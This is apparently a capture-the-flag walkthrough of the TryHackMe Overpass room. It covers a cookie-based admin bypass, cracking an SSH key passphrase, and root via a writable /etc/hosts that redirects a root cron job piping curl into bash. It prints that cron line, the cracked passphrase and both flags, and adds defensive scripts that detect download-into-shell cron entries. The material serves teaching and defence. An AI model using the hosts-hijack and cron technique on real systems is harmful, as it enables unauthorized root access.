
TryHackMe Overpass — Walkthrough


Overpass | TryHackMe

1) Nmap Service Scan

An nmap scan was run to identify open ports on the target.

Nmap


2) Directory Enumeration with Dirsearch

A directory search was performed against the HTTP service on port 80, surfacing several interesting paths.

Dirsearch


3) Admin Login Panel

The scan revealed an /admin panel.

Admin Panel


4) JavaScript Analysis

Inspecting the main.js file discovered during the directory scan, we found that setting a SessionToken cookie grants access to the admin panel without proper authentication.

JS Analysis


5) Cookie Bypass

Setting the SessionToken cookie from the browser console gave us unauthorized access.

Cookie Bypass


6) Obtaining the SSH Key

The admin panel contained a password-protected SSH private key belonging to James, with a note stating the key is encrypted with AES-128-CBC.

SSH Key


7) Converting to Hash with ssh2john.py

The SSH key was converted into a John the Ripper-compatible hash format using the ssh2john.py script.

Convert to Hash


8) Cracking with John the Ripper

Using the rockyou wordlist, the passphrase was cracked: james13

Hash Crack


9) SSH Connection

Using the passphrase together with the private key, an SSH session was established as user james.

SSH Login


10) User Flag

The user.txt file was found in James’s home directory.

thm{65c1aaf000506e56996822c6281e6bf7}

User Flag


11) Crontab Analysis

Inspecting the crontabs revealed a command running every minute as root.

* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
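From the defender's side, the entry above is the classic "download and pipe into a shell" cron job, running as root. The following script is an added example, not part of the original walkthrough: it audits a system crontab file (the /etc/crontab or /etc/cron.d format with a user field) and flags any entry that pipes curl or wget output straight into sh/bash, rating it higher when the user field is root. The sample crontab it builds is constructed for the demonstration; only the overpass.thm line is taken from the page.

```shell
#!/bin/sh
# Added example: audit a system crontab for "download | shell" entries.
# Works on the /etc/crontab and /etc/cron.d/* format, where field 6 is the
# user the command runs as. Per-user crontabs have no user field and would
# need a different runs_as_root check.

# Returns 0 if the line fetches something with curl/wget and pipes it into a shell.
is_pipe_to_shell() {
    printf '%s\n' "$1" |
        grep -Eq '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|z|da)?sh([[:space:]]|$)'
}

# Returns 0 if the entry's user field (field 6) is root.
runs_as_root() {
    printf '%s\n' "$1" |
        awk '$1 !~ /^#/ && NF >= 7 && $6 == "root" { found = 1 } END { exit !found }'
}

# Prints every flagged line from the given file with a severity label and
# returns the number of flagged lines (0 means the file is clean).
audit_crontab_file() {
    count=0
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in ''|\#*) continue ;; esac   # skip blanks and comments
        if is_pipe_to_shell "$line"; then
            if runs_as_root "$line"; then
                printf 'HIGH %s: %s\n' "$1" "$line"
            else
                printf 'MED  %s: %s\n' "$1" "$line"
            fi
            count=$((count + 1))
        fi
    done < "$1"
    return "$count"
}

# Writes a constructed sample crontab to a temp file and prints its path.
# Only the overpass.thm line comes from the walkthrough; the rest is made up.
write_sample_crontab() {
    f=$(mktemp "${TMPDIR:-/tmp}/crontab.XXXXXX") || return 1
    cat > "$f" <<'EOF'
# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
*/5 * * * * james wget -qO- http://updates.example.invalid/agent.sh | sh
0 3 * * * root /usr/bin/apt-get update
EOF
    printf '%s\n' "$f"
}

# Stand-alone demo: audit the constructed sample. Prints two findings and
# "flagged entries: 2".
sample=$(write_sample_crontab)
audit_crontab_file "$sample"
flagged=$?
rm -f "$sample"
printf 'flagged entries: %d\n' "$flagged"
```

On a real host, point audit_crontab_file at /etc/crontab and each file under /etc/cron.d. The regex is deliberately narrow (curl or wget piped into a shell); wrap it in a broader review of anything cron runs as root from a writable or network location.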

12) Hostname and Domain Info

The /etc/hosts file was inspected to confirm the local domain name of the target: overpass.thm.

At this point, the path to privilege escalation is to interfere with that scheduled command.

Crontab Discovery


13) Request Hijacking

We noticed that the /etc/hosts file is writable by user james. Abusing this, we redirected the target domain to our own IP address so that the cron job would fetch a malicious script from us.

A simple HTTP server was started to serve the file from our IP, which the target dutifully requested.
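Two weaknesses combine here: the cron job trusts whatever the network returns, and name resolution for overpass.thm depends on a file a low-privilege user can edit. The script below is an added example, not code from the walkthrough, showing the hardened shape a defender would want: the download goes to a temp file over HTTPS only, its SHA-256 is compared against a pinned value before anything is executed, and a separate check confirms /etc/hosts is owned by root and not group- or world-writable. The URL and the pinned hash in the trailing comment are placeholders.

```shell
#!/bin/sh
# Added example: a hardened replacement for "curl URL | bash" plus a
# permission check for /etc/hosts. Not part of the original walkthrough.

# SHA-256 of a file, using whichever tool the host provides.
file_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# Returns 0 only if the file's SHA-256 equals the pinned value in $2.
verify_script() {
    [ "$(file_sha256 "$1")" = "$2" ]
}

# Returns 0 if the file is owned by user $2 and is not writable by group or
# others. /etc/hosts should pass with "root"; on the target it did not.
file_perms_ok() {
    entry=$(ls -ld "$1") || return 1
    owner=$(printf '%s\n' "$entry" | awk '{print $3}')
    mode=$(printf '%s\n' "$entry" | cut -c1-10)   # e.g. -rw-r--r--
    [ "$owner" = "$2" ] || return 1
    case "$mode" in
        ?????w*|????????w*) return 1 ;;   # char 6 = group write, char 9 = other write
    esac
    return 0
}

# Download over HTTPS only, verify the pinned hash, then execute from disk.
# A tampered, redirected or truncated download is never run. Requires network
# access, so it is not exercised by the stand-alone demo below.
fetch_verify_run() {
    url=$1
    expected=$2
    tmp=$(mktemp "${TMPDIR:-/tmp}/build.XXXXXX") || return 1
    if ! curl --proto '=https' --tlsv1.2 -fsSL -o "$tmp" "$url"; then
        rm -f "$tmp"
        return 1
    fi
    if ! verify_script "$tmp" "$expected"; then
        printf 'hash mismatch for %s, refusing to execute\n' "$url" >&2
        rm -f "$tmp"
        return 1
    fi
    sh "$tmp"
    rc=$?
    rm -f "$tmp"
    return "$rc"
}

# Stand-alone demo: check the local hosts file the way a hardening script would.
if file_perms_ok /etc/hosts root; then
    echo "/etc/hosts: owned by root, not group/world-writable"
else
    echo "/etc/hosts: ownership or permissions need attention"
fi

# Cron entry that would replace the one found on the target (hash is a placeholder):
#   * * * * * root /usr/local/sbin/safe_build.sh
# where safe_build.sh contains:
#   fetch_verify_run https://overpass.thm/downloads/src/buildscript.sh <PINNED_SHA256>
```

Pinning the hash means the job stops (and logs a mismatch) whenever the served script changes, so updates require an explicit hash bump; that is the point. Restricting curl to HTTPS with certificate validation means a hosts-file redirect to an attacker-controlled host fails the TLS handshake instead of serving a script, but the permission fix on /etc/hosts is still the root-cause repair.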


14) Obtaining a Root Shell

Within a minute, a reverse shell with root privileges connected back.

Root Shell


15) Root Flag

With root privileges, root.txt was read to obtain the final flag.

thm{7f336f8c359dbac18d54fdd64ea753bb}

All steps completed successfully — full control over the target was achieved.